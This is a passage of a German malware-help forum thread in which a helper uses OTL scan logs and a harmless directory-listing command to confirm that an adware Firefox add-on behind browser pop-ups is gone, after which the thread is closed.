[2013.05.18 02:10:17 | 009,514,359 | ---- | C] () -- d:\Users\Dani\Desktop\hiero.jar
[2013.05.14 19:39:36 | 002,005,341 | ---- | C] () -- d:\Users\Dani\Desktop\kryonet-2.20.zip
[2013.04.23 21:24:06 | 000,000,056 | ---- | C] () -- d:\Users\Dani\.gitconfig
[2013.02.28 07:07:15 | 000,000,000 | ---- | C] () -- d:\Users\Dani\__ng3d.lock
[2012.11.20 01:56:54 | 000,000,218 | ---- | C] () -- d:\Users\Dani\.recently-used.xbel
[2012.11.03 01:13:59 | 000,007,604 | ---- | C] () -- d:\Users\Dani\AppData\Local\Resmon.ResmonCfg
[2012.08.27 14:30:06 | 000,000,262 | ---- | C] () -- C:\Windows\{EEB3F6BB-318D-4CE5-989F-8191FCBFB578}_WiseFW.ini
[2012.08.12 03:08:58 | 000,003,072 | ---- | C] () -- d:\Users\Dani\AppData\Local\file__0.localstorage
[2012.08.10 00:46:52 | 001,593,956 | ---- | C] () -- C:\Windows\SysWow64\PerfStringBackup.INI
[2012.08.10 00:10:00 | 000,014,119 | ---- | C] () -- C:\Windows\SysWow64\RaCoInst.dat
[2012.08.10 00:09:18 | 000,792,416 | ---- | C] () -- C:\Windows\SysWow64\DiagFunc.dll
[2012.08.10 00:09:18 | 000,000,451 | ---- | C] () -- C:\Windows\SysWow64\DiagFunc.ini
[2012.05.10 16:35:16 | 000,029,184 | ---- | C] () -- C:\Windows\SysWow64\kdbsdk32.dll
[2012.04.20 13:59:44 | 000,001,536 | ---- | C] () -- C:\Windows\SysWow64\IusEventLog.dll
 
========== ZeroAccess Check ==========
 
[2009.07.14 06:55:00 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = C:\Windows\SysNative\shell32.dll -- [2013.02.27 07:52:56 | 014,172,672 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2013.02.27 06:55:05 | 012,872,704 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2012.08.21 15:11:31 | 000,857,088 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2012.08.21 15:37:44 | 000,636,928 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2012.08.21 15:08:38 | 000,453,120 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]
 
========== LOP Check ==========
 
[2013.03.02 21:19:51 | 000,000,000 | ---D | M] -- d:\Users\Dani\AppData\Roaming\Audacity
[2013.04.14 00:01:25 | 000,000,000 | ---D | M] -- d:\Users\Dani\AppData\Roaming\DAEMON Tools Lite
[2013.04.05 19:31:17 | 000,000,000 | ---D | M] -- d:\Users\Dani\AppData\Roaming\e-academy Inc
[2013.02.05 22:18:30 | 000,000,000 | ---D | M] -- d:\Users\Dani\AppData\Roaming\Line 6
[2012.08.10 00:42:32 | 000,000,000 | ---D | M] -- d:\Users\Dani\AppData\Roaming\LolClient
[2012.10.02 17:52:47 | 000,000,000 | ---D | M] -- d:\Users\Dani\AppData\Roaming\PACE Anti-Piracy
[2013.04.04 16:04:35 | 000,000,000 | ---D | M] -- d:\Users\Dani\AppData\Roaming\raidcall
[2012.10.05 01:22:43 | 000,000,000 | ---D | M] -- d:\Users\Dani\AppData\Roaming\TeamViewer
[2012.10.22 18:57:15 | 000,000,000 | ---D | M] -- d:\Users\Dani\AppData\Roaming\Trillian
[2013.06.07 00:14:57 | 000,000,000 | ---D | M] -- d:\Users\Dani\AppData\Roaming\TS3Client
[2012.08.15 01:09:41 | 000,000,000 | ---D | M] -- d:\Users\Dani\AppData\Roaming\ts3overlay
[2012.10.02 17:53:23 | 000,000,000 | ---D | M] -- d:\Users\Dani\AppData\Roaming\Unity
 
========== Purity Check ==========
 
 

< End of report >
         

Tauchen denn die Popups jetzt im Firefox immer noch auf?

Ich bin erst seit ein paar Minuten wieder am PC, deswegen kann ich dir das so noch nicht sagen. Ich hab allerdings über das Wochenende nichts verändert und letzten Freitag kamen noch Popups, deswegen geh ich stark davon aus, dass ich im Laufe des Tages wieder darauf stoßen werde.

Lass mich schnell was nachschauen:

• Starte bitte die OTL.exe.
• Kopiere nun den Inhalt aus der Codebox in die Textbox.

Code: Alles auswählenAufklappen

ATTFilter

dir /a/s/b "C:\_OTL\MovedFiles\" /c
dir /a/s/b "D:\_OTL\MovedFiles\" /c
         

• Schliesse bitte alle anderen Programme.
• Klicke nun auf None (deutsch "Nichts") und danach auf den Scan Button.
• Kopiere danach den Inhalt der OTL.txt hier in deinen Thread.

Das wäre dann das hier:

Code: Alles auswählenAufklappen

ATTFilter

OTL logfile created on: 11.06.2013 15:50:25 - Run 3
OTL by OldTimer - Version 3.2.69.0     Folder = d:\Users\Dani\Desktop
64bit- Professional Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation
Internet Explorer (Version = 9.10.9200.16576)
Locale: 00000407 | Country: Deutschland | Language: DEU | Date Format: dd.MM.yyyy
 
7,96 Gb Total Physical Memory | 6,31 Gb Available Physical Memory | 79,28% Memory free
15,96 Gb Paging File | 14,38 Gb Available in Paging File | 90,11% Paging File free
Paging file location(s): d:\pagefile.sys 8192 8192 [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 111,69 Gb Total Space | 73,82 Gb Free Space | 66,09% Space Free | Partition Type: NTFS
Drive D: | 931,51 Gb Total Space | 801,82 Gb Free Space | 86,08% Space Free | Partition Type: NTFS
Drive E: | 931,51 Gb Total Space | 642,10 Gb Free Space | 68,93% Space Free | Partition Type: NTFS
 
Computer Name: DANI-PC | User Name: Dani | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user | Include 64bit Scans
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: Off | File Age = 30 Days
 
========== Custom Scans ==========
 
< dir /a/s/b "C:\_OTL\MovedFiles\" /c >
 
< dir /a/s/b "D:\_OTL\MovedFiles\" /c >
D:\_OTL\MOVEDFILES\06112013_151802
D:\_OTL\MOVEDFILES\06112013_151802.log

< End of report >
         

Ok, das Addon, welches ich als verantwortlich im Auge gehabt habe, ist verschwunden.
Behalt die Situation mit den Popups bitte mal einen Tag lang im Auge (bzw. bis zum ersten Erscheinen eines solchen).

Bisher keine Popups mehr. Ich hoffe das bleibt so. Welches Addon war es denn, das du in Verdacht hattest?

Weiterhin keine Popups mehr?

Zitat:

Welches Addon war es denn, das du in Verdacht hattest?

Dasjenige, welches ich mit dem OTL-Fix löschen wollte, aber das schon von selbst verschwunden war.. Ich konnte nicht ausfindig machen, wie es genau heisst.

Bisher immer noch keine Popups. Scheint wohl weg zu sein. Also ein Firefox Addon :s Komisch. Hab eigentlich nichts installiert, dem ich nicht trauen würde.
Ich danke dir auf jeden Fall

Ok, dann schliess ich das Thema mal.


Freut mich, dass wir helfen konnten.

Falls du dem Forum noch Verbesserungsvorschläge, Kritik oder ein Lob mitgeben möchtest, kannst du das hier tun.

Dieses Thema scheint erledigt und wird aus meinen Abos gelöscht. Ich bekomme somit keine Benachrichtigung mehr über neue Antworten.
Solltest du das Thema erneut brauchen, schicke mir bitte eine PM und wir machen hier weiter.

Jeder andere bitte diese Anleitung lesen und einen eigenen Thread erstellen.